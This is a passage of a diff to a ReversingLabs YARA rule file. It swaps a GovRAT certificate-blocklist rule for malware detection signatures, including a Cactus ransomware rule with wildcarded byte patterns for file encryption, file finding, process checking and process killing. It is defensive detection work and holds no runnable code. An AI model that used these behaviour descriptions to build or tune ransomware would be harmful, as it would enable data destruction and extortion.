+            8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F6
+        }
+		$enum_resources_1_p3 = {
+            C2 ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ??
+            ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? F6 C2 ?? 74 ?? 8D
+            4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66
+            89 41 ?? 84 D2 79 ?? 8D 4C 24 ?? 49 0F 1F 40 ?? 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
+            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66
+            89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
+            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41
+            ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
+            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66
+            89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D
+            49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41
+            ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
+            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? F7 C2 ?? ?? ?? ?? 74
+        }
+		$enum_resources_2_p1 = {
+            8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ??
+            ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? ?? ??
+            74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ??
+            ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ??
+            8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ??
+            ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01
+            66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C
+            24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89
+            41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ??
+            ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A
+            41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2
+            ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01
+            A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? F7 C2 ?? ??
+            ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89
+        }
+		$enum_resources_2_p2 = {
+            01 A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D
+            4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66
+            89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
+            ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49
+            8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7
+            C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89
+            01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 85 D2 79
+            ?? 8D 4C 24 ?? 49 66 0F 1F 44 00 ?? 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89
+            01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A0 ?? ??
+            ?? ?? 88 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0
+            75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? 8D 4C 24 ?? 8D 51 ?? 8A 01
+            41 84 C0 75 ?? 2B CA 56 88 44 0C ?? FF D7 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 8D
+        }
+		$enum_resources_2_p3 = {
+            84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? FF D7 8B BC 2C ?? ?? ?? ?? 33 D2
+            8B CF 8D 71 ?? 8A 01 41 84 C0 75 ?? 2B CE 8D 43 ?? 03 C1 74 ?? 8B 6C 24 ?? 8B DF 8B
+            CB 42 8D 71 ?? 0F 1F 00 8A 01 41 84 C0 75 ?? 2B CE 8D 45 ?? 03 C1 3B D0 72 ?? 8B 6C
+            24 ?? 8B 5C 24 ?? 8B CF 33 D2 8D 71 ?? 8A 01 41 84 C0 75 ?? 2B CE 8D 43 ?? 03 C1 74
+            ?? 8B 9C 2C ?? ?? ?? ?? 8B 6C 24 ?? 0F 1F 40 ?? 8B CB 42 8D 71 ?? 8A 01 41 84 C0 75
+            ?? 2B CE 8D 45 ?? 03 C1 3B D0 72 ?? 8B 6C 24 ?? 8B 5C 24 ?? 33 D2 8D 4F ?? 8A 07 47
+            84 C0 75 ?? 2B F9 8D 43 ?? 03 C7 74 ?? 8B BC 2C ?? ?? ?? ?? 0F 1F 40 ?? 8B C7 42 8D
+            70 ?? 8A 08 40 84 C9 75 ?? 2B C6 40 03 C3 3B D0 72 ?? 8B 3D ?? ?? ?? ?? 8B 74 24 ??
+            83 EE ?? 89 74 24 ?? 0F 85 ?? ?? ?? ?? 8B 6C 24 ?? 8B F5 C1 E6 ?? 8B 84 34 ?? ?? ??
+            ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 94 34 ?? ?? ?? ?? 66 83 3A ?? 75 ?? 33 C9 EB ?? 8B CA
+        }
+		$enum_resources_2_p4 = {
+            8D 79 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CF D1 F9 51 52 8D 4C 24 ?? E8 ?? ?? ??
+            ?? 8D 44 24 ?? B9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 94 34 ?? ?? ?? ??
+            66 83 3A ?? 75 ?? 33 C9 EB ?? 8B CA 8D 79 ?? 0F 1F 44 00 ?? 66 8B 01 83 C1 ?? 66 85
+            C0 75 ?? EB ?? 8B 94 34 ?? ?? ?? ?? 66 83 3A ?? 75 ?? 33 C9 EB ?? 8B CA 8D 79 ?? 66
+            8B 01 83 C1 ?? 66 85 C0 75 ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ??
+            ?? ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? 8B 94 34 ?? ?? ?? ?? 66 83 3A ?? 75 ?? 33 C9 E9
+            ?? ?? ?? ?? 8B CA 8D 79 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? E9 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? F6 84 34 ?? ?? ?? ?? ?? 74 ?? 8D
+            8C 24 ?? ?? ?? ?? 8D 53 ?? 03 CE E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 45 89 6C 24 ?? 3B
+            6C 24 ?? 0F 82 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 33 F6 8B 44 24 ?? 83 F8 ??
+            72 ?? 8B 4C 24 ?? 40 3D ?? ?? ?? ?? 77 ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 75 ??
+            8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 ?? 8B C8 51 E8 ?? ?? ?? ?? 83
+            C4 ?? 5F 8B C6 5E 5D 5B 81 C4 ?? ?? ?? ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Favorite-III" and pe.signatures [ i ] . serial == "15:7c:3a:4a:6b:cf:35:cf:84:53:e6:b6:c0:07:2e:1d" and 1404172799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $encrypt_files_p* ) ) and ( $find_files ) and ( all of ( $enum_resources_1_p* ) ) and ( all of ( $enum_resources_2_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_04422F12037Bc2032521Dbb6Ae02Ea0E : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Cactus : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing GovRAT malware."
+		description = "Yara rule that detects Cactus ransomware."
 		author = "ReversingLabs"
-		id = "0dc659e8-1f3b-5130-a776-dd9e4141f5f3"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "f391919a-b433-5f8d-8051-f0467118fa1b"
+		date = "2023-12-15"
+		modified = "2023-12-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1508-L1524"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.Cactus.yara#L1-L190"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "381d749d24121d6634656fd33adcda5c3e500ee77a6333f525f351a2ee589e2c"
+		logic_hash = "2953b67e926cb653df0de208b098da3d5c16e6690842ab28fbf8c37cd16f54d7"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Cactus"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            55 41 57 41 56 41 55 41 54 56 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 29 C4 48 8D AC 24
+            ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ??
+            ?? ?? ?? 48 98 48 89 C1 E8 ?? ?? ?? ?? 48 89 45 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
+            89 85 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C1 4C 8D 4D
+            ?? 4C 8D 45 ?? 48 8B 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48
+            89 54 24 ?? 48 8B 95 ?? ?? ?? ?? 48 89 54 24 ?? 48 89 CA 48 89 C1 E8 ?? ?? ?? ?? 48
+            8D 45 ?? 48 8B 95 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45
+            ?? 48 8B 95 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48
+            89 C1 E8 ?? ?? ?? ?? 48 89 C3 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DA
+            48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA
+            ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C2
+            48 8D 85 ?? ?? ?? ?? 41 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 41 B8 ??
+            ?? ?? ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8B 45 ?? 48 8D
+        }
+		$encrypt_files_p2 = {
+            95 ?? ?? ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 4C 8B 85 ?? ?? ?? ?? 48 8B 85 ??
+            ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ??
+            ?? 48 83 C0 ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 95
+            ?? ?? ?? ?? 48 8D 4A ?? 41 B8 ?? ?? ?? ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ??
+            ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 29
+            C2 48 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 98 48 39 85 ?? ?? ?? ?? 0F 8D ?? ?? ??
+            ?? 48 89 E0 48 89 C6 48 8B 85 ?? ?? ?? ?? 48 8D 50 ?? 48 85 C0 48 0F 48 C2 48 C1 F8
+            ?? 48 C1 E0 ?? 48 89 85 ?? ?? ?? ?? 48 8B 9D ?? ?? ?? ?? 48 8D 43 ?? 48 89 85 ?? ??
+            ?? ?? 48 89 D8 49 89 C4 41 BD ?? ?? ?? ?? 48 89 D8 49 89 C6 41 BF ?? ?? ?? ?? 48 89
+            D8 48 83 C0 ?? 48 C1 E8 ?? 48 C1 E0 ?? E8 ?? ?? ?? ?? 48 29 C4 48 8D 44 24 ?? 48 83
+            C0 ?? 48 89 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 8D 85 ?? ??
+            ?? ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 41 89 D9 4C 8B 85 ?? ?? ?? ?? 48 89 E9 48 8D
+            55 ?? 48 8B 85 ?? ?? ?? ?? 44 89 4C 24 ?? 4D 89 C1 49 89 C8 48 89 C1 E8 ?? ?? ?? ??
+            48 8B 85 ?? ?? ?? ?? F7 D8 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 63 D0 48 8D 85 ??
+            ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8D 45 ?? 48
+            8D 95 ?? ?? ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 2B 85
+            ?? ?? ?? ?? 48 89 C2 48 8D 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8
+        }
+		$encrypt_files_p3 = {
+            48 89 DA 48 8B 85 ?? ?? ?? ?? 48 01 D0 48 89 85 ?? ?? ?? ?? 90 48 89 F4 E9 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? 48 63 C8 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 C8 48
+            89 C1 E8 ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? 48 89 E9 48 8D 55 ?? 48 8B 85 ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? 4D 89 C1 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            F7 D8 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 63 D0 48 8D 85 ?? ?? ?? ?? 41 B8 ?? ??
+            ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8D 45 ?? 48 8D 95 ?? ?? ?? ?? 48
+            8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 05 ?? ?? ?? ?? 48 89 85 ??
+            ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 F0 ?? 84
+            C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 48 98 48 8D 55 ?? 48 01 C2 48 89 E9 48 8B 85 ?? ?? ??
+            ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8D 45 ?? 48 8D 95 ?? ?? ??
+            ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8B 45 ?? 48 8D 95 ?? ??
+            ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 4C 8B 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ??
+            48 8D 95 ?? ?? ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 83
+            C0 ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ??
+            ?? 48 8D 4A ?? 41 B8 ?? ?? ?? ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89
+         }
+		$encrypt_files_p4 = {
+            C1 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1
+            E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 41 B8
+            ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 89
+            C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 84 DB 74 ?? 48 8D 45 ?? 48 89 C1 E8
+            ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ??
+            48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DA 48 89 C1 48 8B 05 ?? ?? ?? ??
+            FF D0 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D
+            85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 F4 48 89 C3 EB ?? 48 89 C3 48 8D
+            85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ??
+            ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ??
+            ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 8D A5 ?? ??
+            ?? ?? 5B 5E 41 5C 41 5D 41 5E 41 5F 5D C3
+        }
+		$find_files_p1 = {
+            55 56 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 29 C4 48 8D AC 24 ?? ?? ?? ?? 48 89 8D ??
+            ?? ?? ?? 48 8D 45 ?? BB ?? ?? ?? ?? 48 89 C6 EB ?? 48 89 F1 E8 ?? ?? ?? ?? 48 83 EB
+            ?? 48 83 C6 ?? 48 85 DB 79 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0
+            0F 95 C0 84 C0 74 ?? 48 8B 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ??
+            ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ??
+            84 C0 74 ?? 48 8D 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85
+            ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ??
+            ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ??
+            ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 84 C0 74 ?? 48 8D 45 ?? 8B 95 ?? ?? ?? ?? 48 63
+            D2 48 C1 E2 ?? 48 01 C2 48 8D 85 ?? ?? ?? ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1
+            E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48
+        }
+		$find_files_p2 = {
+            89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 8B 95 ?? ?? ?? ?? 48 63 D2 48 C1 E2 ?? 48 01 C2 48
+            8D 85 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D
+            85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ??
+            83 85 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 85 ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? C6 05 ??
+            ?? ?? ?? ?? 48 8D 5D ?? 48 81 C3 ?? ?? ?? ?? 48 8D 45 ?? 48 39 C3 74 ?? 48 83 EB ??
+            48 89 D9 E8 ?? ?? ?? ?? EB ?? 90 E9 ?? ?? ?? ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89
+            C1 E8 ?? ?? ?? ?? 48 89 DE EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ??
+            ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DE EB ?? 48 89
+            C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DE EB ?? 48 89 C3 48 8D 85 ??
+            ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DE EB ?? 48 89 C6 48 8D 5D ?? 48 81 C3 ?? ??
+            ?? ?? 48 8D 45 ?? 48 39 C3 74 ?? 48 83 EB ?? 48 89 D9 E8 ?? ?? ?? ?? EB ?? 90 48 89
+            F0 48 89 C1 E8 ?? ?? ?? ?? 90 48 81 C4 ?? ?? ?? ?? 5B 5E 5D C3
+        }
+		$check_processes = {
+            55 53 48 83 EC ?? 48 8D 6C 24 ?? 48 89 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? EB ?? 8B 45 ?? 48 98 48 8D 14 C5 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 8B 1C 02 48
+            8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DA 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 85
+            C0 0F 95 C0 84 C0 74 ?? B8 ?? ?? ?? ?? EB ?? 83 45 ?? ?? 8B 45 ?? 3B 45 ?? 7C ?? B8
+            ?? ?? ?? ?? 48 83 C4 ?? 5B 5D C3
+        }
+		$kill_file_processes_p1 = {
+            55 56 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? C6 85 ??
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF C0
+            0F 11 45 ?? F3 0F 6F 4D ?? 0F 11 8D ?? ?? ?? ?? F3 0F 6F 55 ?? 0F 11 95 ?? ?? ?? ??
+            F3 0F 6F 5D ?? 0F 11 9D ?? ?? ?? ?? F3 0F 6F 65 ?? 0F 11 A5 ?? ?? ?? ?? 0F B7 45 ??
+            66 89 85 ?? ?? 00 00 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 BA ?? ?? ??
+            ?? 48 89 C1 E8 ?? ?? ?? ?? 85 C0 0F 94 C0 84 C0 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 41 B9
+            ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 85 C0 0F 94 C0
+            84 C0 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 4C
+            8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 89 4C 24 ?? 41 B9 ??
+            ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ??
+            8B 85 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? BB ?? ?? ?? ??
